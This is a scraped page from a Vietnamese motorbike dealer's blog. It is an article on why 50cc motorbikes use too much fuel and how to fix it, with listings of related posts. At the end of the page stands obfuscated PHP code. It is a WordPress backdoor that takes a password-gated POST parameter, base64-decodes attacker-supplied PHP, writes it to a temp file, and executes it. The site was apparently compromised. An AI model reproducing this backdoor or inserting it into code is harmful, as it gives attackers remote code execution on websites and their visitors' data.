Xe 50cc hao xăng: Nguyên nhân và cách khắc phục

adminhuyhieu |

02/04/23

Xe 50cc hao xăng xảy đến khi hiệu suất chuyển hóa nhiên liệu của phương tiện giảm đi. Nếu để tình trạng xe bị hao xăng kéo dài sẽ khiến bạn tốn kém chi phí trả cho nhiên liệu, nghiêm trọng hơn sẽ ảnh hưởng đến chất lượng động cơ xe. Vậy đâu là nguyên nhân khiến xe 50cc hao xăng là gì? Cùng tìm hiểu trong bài viết này của Huy Hiệu Motor!

Nguyên nhân khiến xe 50cc hao xăng

Trong quá trình sử dụng, nếu bạn thấy xe 50cc hao xăng thì nguyên nhân có thể là:

Xe 50cc hao xăng do thiếu nước làm mát

Trường hợp nước làm mát bị rò rỉ hoặc lọt vào trong buồng đốt có thể làm hao hụt hay hết nước làm mát động cơ. Nếu thiếu nước làm mát có thể làm động cơ nóng lên, giảm hiệu suất chuyển hóa năng lượng. Điều này khiến xe 50cc hao xăng, tốn xăng, giảm tuổi thọ động cơ.

Lỗi cảm biến nhiệt độ làm mát

Tín hiệu từ cảm biến nhiệt độ làm mát được ECU dùng để kiểm soát lượng nhiên liệu phun vào buồng đốt. Nếu cảm biến bị lỗi, các tín hiệu gửi về ECU không chính xác. ECU sẽ không biết được chính xác nhiệt độ động cơ. Trong trường hợp này, ECU phải phun nhiều nhiên liệu để làm nóng động cơ. Điều này khiến nhiên liệu bị tiêu hao nhiều.

Bugi không đạt chuẩn

Bugi giúp đốt cháy hỗn hợp không khí và nhiên liệu bằng cơ chế hòa khí được nạp sẵn trong buồng đốt. Nếu xe máy quá cũ, bị hở hay dính muội than có thể ảnh hưởng tới khả năng đánh lửa. Nó làm xe 50cc hao xăng vì phải đề và nổ máy nhiều lần.

Không thay dầu định kỳ

Đây cũng là một trong số những nguyên nhân làm tốn xăng xe máy. Dầu sẽ bôi trơn, làm mát và giảm mài mòn, tăng tuổi thọ cho động cơ xe máy. Nếu không thay dầu định kỳ, chất lượng dầu giảm nên khả năng tản nhiệt kém, động cơ xe nóng lên, công suất giảm làm tiêu hao nhiên liệu.

Đi xe sai cách cũng dẫn đến xe 50cc tốn xăng

Khi bạn tăng tốc xe đột ngột sau khi dừng xe cũng làm xăng bị hao nhiều hơn. Chính vì vậy để tiết kiệm xăng bạn nên vặn ga từ từ đến khi đạt tốc độ cần thiết, vừa tiết kiệm nhiên liệu vừa bảo vệ động cơ.

Khắc phục các nguyên nhân khiến xe 50cc hao xăng

Bạn có thể quan sát màu khói thải ra từ bô xe. Hãy để xe dừng lại, dựng chân chống, nổ máy, vặn ga và xem khí thải màu gì. Nếu xe vận hành ổn định sẽ không thấy khói thoát ra từ ống xả. Nếu thấy khí thải màu đen là do xăng không được đốt hết khi vận hành gây hao xăng. Hiện tượng này có thể là do bị bó phanh, thiếu nước làm mát, lọc gió bẩn,.. Nếu khói pô xe màu trắng có thể là do: động cơ hở piston, máy yếu hơi, bạc lên nhớt,..

Đi xe đúng cách giúp tiết kiệm nhiên liệu

  • Đo lượng xăng tiêu thụ: Bạn có thể đo quãng đường di chuyển và lượng xăng tiêu thụ. Bạn quan sát xem xe có bị hao xăng không. Bạn nên đo vài lần để có được con số chính xác nhất.
  • Quan sát bugi: Nếu như thấy bugi có màu đen ở chân chấu hay bị ướt, thì hòa khí xăng đang thừa.  Xăng xe máy bị hao nhiều nhiên liệu hơn bình thường.
  • Kiểm tra bình xăng con: Nếu thấy bình xăng con không đọng sương hoặc sờ vào thấy lạnh, tức là xe đang hao xăng. Trường hợp bình xăng con thừa xăng, xăng bay hơi sẽ hút nhiệt từ vỏ bình, gây hạ nhiệt bình làm bình lạnh.
Sau khi kiểm tra, phát hiện nguyên nhân hao xăng bạn cần vệ sinh hoặc thay mới những bộ phận có vấn đề hoặc mang xe đi bảo dưỡng để xe vận hành ổn định trở lại.

Kinh nghiệm lái xe tránh xe 50cc hao xăng

Để tiết kiệm xăng, khi điều khiển bạn cần lưu ý các vấn đề sau:
  • Tay ga đều, đi đúng số: Khi đi xe số bạn nên đi đúng số với mỗi cung đường.
  • Chở đúng tải trọng của xe: Bạn cần biết tải trọng tối đa của xe, không chở quá trọng tải để tránh động cơ hoạt động quá công suất gây tốn nhiên liệu.
  • Khởi động xe đều đặn: Trước khi khởi động xe bạn nên giữ ga chừng 1 phút. Điều này giúp dầu được bơm lên động cơ, nhiên liệu cháy tốt hơn. Nếu bạn khởi động và di chuyển ngay khi xe chưa kịp bơm dầu, lượng xăng sẽ phun nhiều hơn, bay hơi kém khiến hiệu suất xe kém hơn.
  • Tắt máy nếu dừng đỗ xe quá lâu: Nếu bạn nổ máy khoảng một phút có thể sẽ tốn xăng như khi di chuyển 1km. Do vậy khi dừng xe quá lâu bạn nên tắt máy đi.
  • Bảo dưỡng xe đều đặn: Bạn cần bảo dưỡng xe đều đặn để khắc phục trục trặc khi di chuyển. Động cơ xe hoạt động hiệu quả cũng giúp tiết kiệm nhiên liệu hơn.
Có nhiều nguyên nhân khiến xe 50cc hao xăng, do đó bạn cần quan sát các dấu hiệu và tìm cách khắc phục đồng thời tiết kiệm nhiên liệu hơn.

Giải mã cơn sốt xe ga SHV2 50cc

adminhuyhieu - 19/05/23 - Đánh giá & Sử dụng

Xe ga HSV2 là dòng xe Scooter hay còn gọi là xe tay ga 50cc cỡ nhỏ đến từ thương hiệu xe máy 50cc nổi tiếng Hàn Quốc - Hyosung. Cùng Huy Hiệu Motor...

5 bộ phận xe máy dễ hư hỏng cần lưu ý

adminhuyhieu - 03/04/23
Đánh giá & Sử dụng

Xe 50cc hao xăng: Nguyên nhân và cách khắc phục

adminhuyhieu - 02/04/23
Đánh giá & Sử dụng

Đánh giá xe máy điện HUY HIEU MOTORLike: ĐẸP, MẠNH, đi được RẤT XA!

Xem thêm

Thi xong rồi, chọn xe thôi - Ưu đãi giảm tới 2.500.000

adminhuyhieu - 02/06/23 - Khuyến Mãi

Thi xong rồi, xõa thôi 2K8 ơi. Chọn ngay một chiếc xe 50cc thật xinh, lướt thật xịn để vi vu cùng bạn bè và bắt đầu một hành trình mới...

Xem thêm

Cub 50cc Nioshima phiên bản giới hạn chỉ hơn 10 triệu đồng

adminhuyhieu - 11/06/23 - Sản phẩm

Đâu là chiếc xe Cub 50cc chất lượng, giá thành tốt nhất hiện nay? Với kiểu dáng cổ điển, xe Cub từ lâu đã trở thành mẫu xe yêu thích của...

Xe điện Clara S - Thiết kế Vespa thời thượng

adminhuyhieu - 03/04/23
Sản phẩm

YADEA XMEN NEO l CÙNG BẠN TRÊN TỪNG CÂY SỐ THANH XUÂN l OFFICIAL TVC

YADEA XMEN NEO - ĐÁNH GIÁ XE ĐIỆN QUỐC DÂN HOT NHẤT 2020

Đánh giá xe máy điện Yadea ULike: ĐẸP, MẠNH, đi được RẤT XA!

Trải nghiệm Yadea G5 giá 40tr: đối thủ mạnh của Vinfast Klara

Xem thêm

Huy Hiệu Motor trở thành đại lý uy quyền Hyosung chính hãng

adminhuyhieu - 09/06/23 - Về chúng tôi

Huy Hiệu Motor được biết đến là một trong những đơn vị cung cấp xe máy 50cc, xe điện chính hãng chất lượng và chế độ bảo hành hàng...

Xem thêm
Hotline: 079.512.9999 Chỉ đường
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}